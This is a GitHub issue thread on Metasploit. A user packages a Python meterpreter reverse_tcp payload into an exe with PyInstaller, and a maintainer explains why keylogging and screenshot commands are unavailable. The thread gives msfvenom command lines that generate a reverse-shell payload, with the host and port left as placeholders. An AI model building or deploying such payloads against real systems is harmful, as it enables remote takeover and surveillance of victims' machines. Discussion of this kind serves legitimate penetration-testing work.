### ISSUE TITLE
Pyinstaller + Msfvenom payload

### ISSUE THREAD

**Issue by abouhad12** [rapid7/metasploit-framework#13139]
Hello, I created a python payload in msfvenom.
Then I compile to exe with PyInstaller all goes good but when it comes to commands it doesn't work for example screenshot download execute getpid keyscan .. 

I tried adding this in payload source code 
For anyone else trying this, decode the base64 from the generated payload, add the followings imports

import shutil,
import platform
import code
import socket
import struct
import time
import sys
import cStringIO
import binascii
import os
import random
import re
import select
import subprocess
import threading
import traceback

I added them as import time,traceback,threading .... in source code.

The only command I can run it's sysinfo.

**Comment by bwatters-r7** [comment]
Please provide the msfvenom command (without IP address if it is public).

**Comment by abouhad12** [comment]
msfvenom -p python/meterpreter/reverse_tcp LHOST=X LPORT=X R > hello.py 
msfvenom -p python/meterpreter/reverse_tcp LHOST=X LPORT=X -f raw R>hello.py

**Comment by timwr** [comment]
The python meterpreter doesn't have the keyscan_start, screenshot or migrate commands. You need a native meterpreter (windows/meterpreter/reverse_tcp) session for those features. You might be able to upgrade a python meterpreter session to the native meterpreter with `sessions -u <id>`.
